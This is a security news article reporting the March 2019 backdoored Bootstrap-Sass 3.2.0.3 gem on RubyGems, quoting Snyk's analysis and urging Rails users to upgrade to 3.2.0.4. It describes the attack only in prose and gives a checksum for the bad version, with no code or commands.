Bootstrap-Sass v3.2.0.3 Loaded With Malware, Update To 3.2.0.4 ASAP

Malware Attack Using Google Cloud Computing Platform

Popular UI framework Bootstrap-Sass hosted malicious code in its library that provides an attacker to perform a remote code execution, the affected version is 3.2.0.3 and earlier. Security consulting firm, Bad Packets has indicated a somewhat backdoor-like code inside the Ruby framework composed of an executable cookie. Apparently, one of the developers had his account hijacked by someone else, who then took advantage of the access in order to install snippets of code to the project.

The revelation of Bad Packets is confirmed by Snyk, also a vulnerability assessment firm. Teams from both companies have been examining and observing Bootstrap-Sass version 3.2.0.3 since March 26, 2019. “On March 26, 2019, a malicious version of the popular bootstrap-sass package, that has been downloaded a total of 28 million times to date, was published to the official RubyGems repository. We assume that the attacker has obtained the credentials to publish the malicious RubyGems package from one of the two maintainers, but this has not been officially confirmed. Version 3.2.0.3 includes a stealthy backdoor that gives attackers remote command execution on server-side Rails applications,” said Liran Tal of Snyk.

Tal continues to describe the scenes on how they were able to verify the existence of the back door. He revealed that a certain Derek Barnes has initially raised a questionable content of the twbs/bootstrap-sass repository. He is the person who informed the authors and the community about the malicious code. As of March 26 at 11:56 PM GMT, the project were considered as clean, with the malicious backdoor removed by the maintainers. “On the same day, Derek Barnes opened a GitHub issue for the twbs/bootstrap-sass repository that raised an issue related to the malicious version and pointed out a suspicious snippet of code that is bundled with version 3.2.0.3 of bootstrap-sass. The backdoor was wisely hidden in the 3.2.0.3 version that was only published to RubyGems and no source of the malicious version existed on the GitHub repository and allowed remote attackers to dynamically execute code on servers hosting the vulnerable versions,” explained Tal.

Tal is highly recommending that everyone that uses Rails application to immediately update to version 3.2.0.4, a quick fix issued by the Ruby team in order to mitigate the vulnerability. With version 3.2.0.3 and older were downloaded 27 million times before the patched version 3.2.0.4 has been released. The backdoor-loaded version has a SHA256 checksum of 366d6162fe36fc81dadc114558b43c6c8890c8bcc7e90e2949ae6344d0785dc0.

“You can run a one-off test for your open source project by clicking here to test your repositories, or by using our CLI to test your projects locally. If you found out your Rails application is making use of the vulnerable project take immediate steps to replace the current vulnerable version of 3.2.0.3 with the re-published 3.2.0.4 version as first response mitigation without requiring major version upgrades,” concluded Tal.

Also, Read:

Game of Thrones Downloads Widely Used to Spread Malware

Fileless Malware, The Archilles Hill Of Traditional Antivirus Software

Hackers Surgically Infected Asus Computers with Malware

Julia Sowells918 Posts

Julia Sowells has been a technology and security professional. For a decade of experience in technology, she has worked on dozens of large-scale enterprise security projects, and even writing technical articles and has worked as a technical editor for Rural Press Magazine. She now lives and works in New York, where she maintains her own consulting firm with her role as security consultant while continuing to write for Hacker Combat in her limited spare time.

0 Comments

Leave a Comment

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password
Register